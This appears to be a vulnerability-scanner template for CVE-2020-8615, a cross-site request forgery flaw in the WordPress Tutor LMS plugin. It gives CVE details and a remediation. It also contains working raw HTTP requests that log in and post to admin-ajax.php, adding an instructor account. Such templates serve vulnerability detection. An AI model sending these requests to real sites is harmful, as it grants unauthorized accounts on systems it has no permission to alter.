id: CVE-2020-8615 info: name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery author: r3Y3r53 severity: medium description: | A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). remediation: update to v.1.5.3 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 - https://wpscan.com/vulnerability/10058 - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cwe-id: CWE-352 cve-id: CVE-2020-8615 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/tutor/" tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor cookie-reuse: true matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and